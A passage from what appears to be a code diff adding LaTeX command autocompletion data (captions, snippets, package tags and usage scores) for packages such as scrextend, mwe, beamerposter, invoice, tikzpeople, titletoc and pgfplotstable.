+ caption: '\\cleardoublepage', + snippet: '\\cleardoublepage', + meta: 'scrextend-cmd', + score: 0.044016804142963585, + }, + { + caption: '\\tiny{}', + snippet: '\\tiny{$1}', + meta: 'scrextend-cmd', + score: 0.047727606910742924, + }, + { + caption: '\\tiny', + snippet: '\\tiny', + meta: 'scrextend-cmd', + score: 0.047727606910742924, + }, + { + caption: '\\deffootnote[]{}{}{}', + snippet: '\\deffootnote[$1]{$2}{$3}{$4}', + meta: 'scrextend-cmd', + score: 2.545393270896533e-5, + }, + { + caption: '\\thefootnote', + snippet: '\\thefootnote', + meta: 'scrextend-cmd', + score: 0.007676927812687567, + }, + { + caption: '\\thefootnote{}', + snippet: '\\thefootnote{$1}', + meta: 'scrextend-cmd', + score: 0.007676927812687567, + }, + { + caption: '\\normalsize', + snippet: '\\normalsize', + meta: 'scrextend-cmd', + score: 0.14261697855738878, + }, + { + caption: '\\normalsize{}', + snippet: '\\normalsize{$1}', + meta: 'scrextend-cmd', + score: 0.14261697855738878, + }, + { + caption: '\\titlefont', + snippet: '\\titlefont', + meta: 'scrextend-cmd', + score: 0.0005278519180709353, + }, + { + caption: '\\thefootnotemark', + snippet: '\\thefootnotemark', + meta: 'scrextend-cmd', + score: 2.545393270896533e-5, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'scrextend-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'scrextend-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\addtokomafont{}{}', + snippet: '\\addtokomafont{$1}{$2}', + meta: 'scrextend-cmd', + score: 0.0008555564394100388, + }, + { + caption: '\\setkomafont{}{}', + snippet: '\\setkomafont{$1}{$2}', + meta: 'scrextend-cmd', + score: 0.012985816912639263, + }, + { + caption: '\\KOMAoptions{}', + snippet: '\\KOMAoptions{$1}', + meta: 'scrextend-cmd', + score: 0.000396664302361659, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'scrextend-cmd', + score: 0.00037306820619479756, + }, + ], + mwe: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mwe-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'mwe-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'mwe-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'mwe-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'mwe-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'mwe-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'mwe-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mwe-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'mwe-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mwe-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'mwe-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'mwe-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'mwe-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'mwe-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'mwe-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'mwe-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'mwe-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'mwe-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'mwe-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mwe-cmd', + score: 0.008565354665444157, + }, + ], + beamerposter: [ + { + caption: '\\scriptsize', + snippet: '\\scriptsize', + meta: 'beamerposter-cmd', + score: 0.05550618634921613, + }, + { + caption: '\\scriptsize{}', + snippet: '\\scriptsize{$1}', + meta: 'beamerposter-cmd', + score: 0.05550618634921613, + }, + { + caption: '\\Large', + snippet: '\\Large', + meta: 'beamerposter-cmd', + score: 0.1987771081149759, + }, + { + caption: '\\Large{}', + snippet: '\\Large{$1}', + meta: 'beamerposter-cmd', + score: 0.1987771081149759, + }, + { + caption: '\\footnotesize', + snippet: '\\footnotesize', + meta: 'beamerposter-cmd', + score: 0.2038592081252624, + }, + { + caption: '\\footnotesize{}', + snippet: '\\footnotesize{$1}', + meta: 'beamerposter-cmd', + score: 0.2038592081252624, + }, + { + caption: '\\LARGE', + snippet: '\\LARGE', + meta: 'beamerposter-cmd', + score: 0.05947642043953873, + }, + { + caption: '\\LARGE{}', + snippet: '\\LARGE{$1}', + meta: 'beamerposter-cmd', + score: 0.05947642043953873, + }, + { + caption: '\\large', + snippet: '\\large', + meta: 'beamerposter-cmd', + score: 0.20377416734108866, + }, + { + caption: '\\large{}', + snippet: '\\large{$1}', + meta: 'beamerposter-cmd', + score: 0.20377416734108866, + }, + { + caption: '\\VeryHuge', + snippet: '\\VeryHuge', + meta: 'beamerposter-cmd', + score: 0.000892251826639951, + }, + { + caption: '\\small', + snippet: '\\small', + meta: 'beamerposter-cmd', + score: 0.2447632045426295, + }, + { + caption: '\\small{}', + snippet: '\\small{$1}', + meta: 'beamerposter-cmd', + score: 0.2447632045426295, + }, + { + caption: '\\VERYHuge', + snippet: '\\VERYHuge', + meta: 'beamerposter-cmd', + score: 0.0011668714784222325, + }, + { + caption: '\\veryHuge', + snippet: '\\veryHuge', + meta: 'beamerposter-cmd', + score: 0.000892251826639951, + }, + { + caption: '\\normalsize', + snippet: '\\normalsize', + meta: 'beamerposter-cmd', + score: 0.14261697855738878, + }, + { + caption: '\\normalsize{}', + snippet: '\\normalsize{$1}', + meta: 'beamerposter-cmd', + score: 0.14261697855738878, + }, + { + caption: '\\tiny{}', + snippet: '\\tiny{$1}', + meta: 'beamerposter-cmd', + score: 0.047727606910742924, + }, + { + caption: '\\tiny', + snippet: '\\tiny', + meta: 'beamerposter-cmd', + score: 0.047727606910742924, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'beamerposter-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'beamerposter-cmd', + score: 0.021170869458413965, + }, + ], + footnote: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'footnote-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'footnote-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\makesavenoteenv{}', + snippet: '\\makesavenoteenv{$1}', + meta: 'footnote-cmd', + score: 0.0018587414325895479, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'footnote-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'footnote-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\parbox{}{}', + snippet: '\\parbox{$1}{$2}', + meta: 'footnote-cmd', + score: 0.04800611019618169, + }, + ], + invoice: [ + { + caption: '\\Fee{}{}{}', + snippet: '\\Fee{$1}{$2}{$3}', + meta: 'invoice-cmd', + score: 0.003295435821387378, + }, + { + caption: '\\ProjectTitle{}', + snippet: '\\ProjectTitle{$1}', + meta: 'invoice-cmd', + score: 0.003295435821387378, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'invoice-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'invoice-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'invoice-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'invoice-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'invoice-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'invoice-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\endhead', + snippet: '\\endhead', + meta: 'invoice-cmd', + score: 0.0023853501147448834, + }, + { + caption: '\\endfoot', + snippet: '\\endfoot', + meta: 'invoice-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'invoice-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'invoice-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\nopagebreak', + snippet: '\\nopagebreak', + meta: 'invoice-cmd', + score: 9.952664522415981e-5, + }, + { + caption: '\\endfirsthead', + snippet: '\\endfirsthead', + meta: 'invoice-cmd', + score: 0.0016148498709822416, + }, + { + caption: '\\endlastfoot', + snippet: '\\endlastfoot', + meta: 'invoice-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'invoice-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\tablename', + snippet: '\\tablename', + meta: 'invoice-cmd', + score: 0.0029238994233674776, + }, + { + caption: '\\pagebreak', + snippet: '\\pagebreak', + meta: 'invoice-cmd', + score: 0.0313525090421608, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'invoice-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'invoice-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'invoice-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'invoice-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'invoice-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'invoice-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'invoice-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'invoice-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'invoice-cmd', + score: 0.028955796305270766, + }, + ], + tikzpeople: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzpeople-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'tikzpeople-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikzpeople-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikzpeople-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'tikzpeople-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'tikzpeople-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikzpeople-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikzpeople-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tikzpeople-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tikzpeople-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tikzpeople-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikzpeople-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tikzpeople-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzpeople-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tikzpeople-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikzpeople-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tikzpeople-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikzpeople-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'tikzpeople-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'tikzpeople-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'tikzpeople-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'tikzpeople-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'tikzpeople-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'tikzpeople-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'tikzpeople-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'tikzpeople-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'tikzpeople-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'tikzpeople-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikzpeople-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'tikzpeople-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'tikzpeople-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzpeople-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tikzpeople-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikzpeople-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikzpeople-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tikzpeople-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikzpeople-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tikzpeople-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzpeople-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tikzpeople-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tikzpeople-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tikzpeople-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tikzpeople-cmd', + score: 0.2864294797053033, + }, + ], + titletoc: [ + { + caption: '\\thecontentspage', + snippet: '\\thecontentspage', + meta: 'titletoc-cmd', + score: 0.0008054115902675176, + }, + { + caption: '\\startcontents', + snippet: '\\startcontents', + meta: 'titletoc-cmd', + score: 0.00026847053008917257, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'titletoc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'titletoc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\printcontents{}{}{}', + snippet: '\\printcontents{$1}{$2}{$3}', + meta: 'titletoc-cmd', + score: 0.00013423526504458629, + }, + { + caption: '\\titlecontents{}[]', + snippet: '\\titlecontents{$1}[$2]', + meta: 'titletoc-cmd', + score: 0.0017036290423289926, + }, + { + caption: '\\titlecontents{}[]{}{}{}{}[]', + snippet: '\\titlecontents{$1}[$2]{$3}{$4}{$5}{$6}[$7]', + meta: 'titletoc-cmd', + score: 0.0017036290423289926, + }, + { + caption: '\\titlecontents{}[]{}{}{}{}', + snippet: '\\titlecontents{$1}[$2]{$3}{$4}{$5}{$6}', + meta: 'titletoc-cmd', + score: 0.0017036290423289926, + }, + { + caption: '\\numberline{}', + snippet: '\\numberline{$1}', + meta: 'titletoc-cmd', + score: 0.007461440567272885, + }, + { + caption: '\\dottedcontents{}[]{}{}{}', + snippet: '\\dottedcontents{$1}[$2]{$3}{$4}{$5}', + meta: 'titletoc-cmd', + score: 4.743909531747666e-5, + }, + { + caption: '\\filcenter', + snippet: '\\filcenter', + meta: 'titletoc-cmd', + score: 0.0004835660211260246, + }, + { + caption: '\\thecontentslabel', + snippet: '\\thecontentslabel', + meta: 'titletoc-cmd', + score: 0.0010521864830662522, + }, + { + caption: '\\contentsuse{}{}', + snippet: '\\contentsuse{$1}{$2}', + meta: 'titletoc-cmd', + score: 6.110202388233705e-5, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'titletoc-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\contentspage', + snippet: '\\contentspage', + meta: 'titletoc-cmd', + score: 0.0004955116569277163, + }, + { + caption: '\\contentslabel[]{}', + snippet: '\\contentslabel[$1]{$2}', + meta: 'titletoc-cmd', + score: 0.0011055859582683105, + }, + { + caption: '\\contentslabel{}', + snippet: '\\contentslabel{$1}', + meta: 'titletoc-cmd', + score: 0.0011055859582683105, + }, + { + caption: '\\contentsmargin{}', + snippet: '\\contentsmargin{$1}', + meta: 'titletoc-cmd', + score: 0.00013423526504458629, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'titletoc-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\titlerule', + snippet: '\\titlerule', + meta: 'titletoc-cmd', + score: 0.019273712561461216, + }, + { + caption: '\\titlerule[]{}', + snippet: '\\titlerule[$1]{$2}', + meta: 'titletoc-cmd', + score: 0.019273712561461216, + }, + ], + dblfloatfix: [ + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'dblfloatfix-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'dblfloatfix-cmd', + score: 0.354445763583904, + }, + { + caption: '\\textsubscript{}', + snippet: '\\textsubscript{$1}', + meta: 'dblfloatfix-cmd', + score: 0.058405875394131175, + }, + { + caption: '\\em', + snippet: '\\em', + meta: 'dblfloatfix-cmd', + score: 0.10357353994640862, + }, + ], + pgfplotstable: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfplotstable-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfplotstable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfplotstable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfplotstable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfplotstable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'pgfplotstable-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'pgfplotstable-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'pgfplotstable-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'pgfplotstable-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'pgfplotstable-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfplotstable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'pgfplotstable-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'pgfplotstable-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfplotstable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfplotstable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfplotstable-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfplotstable-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfplotstable-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfplotstable-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgfplotstable-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfplotstable-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfplotstable-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfplotstable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgfplotstable-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfplotstable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfplotstable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfplotstable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfplotstable-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfplotstable-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfplotstable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfplotstable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfplotstable-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfplotstable-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfplotstable-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfplotstable-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfplotstable-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfplotstable-cmd', + score: 0.00530510025314411, + }, + { + caption: 